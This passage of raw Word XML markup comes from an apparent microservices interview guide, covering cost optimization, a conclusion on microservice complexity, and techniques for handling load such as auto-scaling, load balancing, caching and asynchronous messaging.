          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>containerization</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Docker, Kubernetes) to reduce infrastructure costs and improve scalability. Optimize resource utilization and minimize overhead by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>serverless</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FaaS (Function-as-a-Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> models where applicable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A1DF63" w14:textId="77777777" w:rsidR="00312742"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6F5E9790">
          <v:rect id="_x0000_i2905" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D03AE9C" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314E61C0" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00CE4B95" w:rsidRDefault="00312742" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>While microservices offer great advantages in scalability, maintainability, and flexibility, they also come with increased complexity, both from a technical and organizational standpoint. Addressing these challenges involves adopting best practices, tools, and patterns that promote automation, monitoring, fault tolerance, and efficient communication between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0A35F3" w14:textId="6BCC18CD" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00115965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="4C622256">
          <v:rect id="_x0000_i2906" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD95D9D" w14:textId="3FC7261F" w:rsidR="001659D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="693" w:name="_Toc196308173"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How are you handling load in your microservices</w:t>
      </w:r>
      <w:r w:rsidR="001659D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="693"/>
    </w:p>
    <w:p w14:paraId="0B59B93D" w14:textId="2BE9A7B5" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Handling load in microservices involves implementing strategies to ensure the system can handle varying amounts of traffic efficiently, scale as needed, and maintain high availability. Here are some key techniques used to handle load in microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C240C7D" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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1. Horizontal Scaling (Auto-scaling)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFFDB25" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This involves adding more instances of a service to distribute the load across multiple instances. It's one of the most common ways to handle load in microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B86FC13" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it's done</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44813261" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Use container orchestration tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes</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Docker Swarm</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manage and scale services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B768609" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Implement auto-scaling policies based on CPU usage, memory usage, or request count to scale the microservices up or down automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D00D617" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cloud services</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like AWS, Azure, or GCP offer auto-scaling features as part of their managed services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242233DB" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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2. Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2C2A01" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Load balancing helps distribute incoming requests to multiple instances of a service to ensure no single instance is overwhelmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C545335" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it's done</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A091934" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API Gateways</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kong</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Zuul</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Spring Cloud Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) for routing and load balancing requests to backend microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A18D0F5" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Round-Robin</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Least Connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> algorithms in load balancers like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HAProxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or cloud-based load balancing solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35152497" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Load balancing can also be done at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service mesh</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> level, e.g., using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Istio</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which provides sophisticated routing and traffic management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072989AE" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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3. Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F937D00" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Caching reduces the load on microservices by storing frequently accessed data in memory, reducing the need for repetitive computations or database queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382F49F5" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it's done</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0935177F" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Use distributed cache systems like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Redis</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Memcached</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to cache frequently accessed data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D30E4B" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> headers (e.g., Cache-Control) can be used to cache responses on the client side or API Gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD84510" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>content delivery networks (CDN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for static content to offload requests from the backend servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DE4D47" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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4. Asynchronous Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79478E28" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of handling requests synchronously, where one service must wait for another, asynchronous communication helps in decoupling services, allowing for non-blocking requests and better load distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49258DEA" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it's done</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C22DBD" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Use message brokers like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
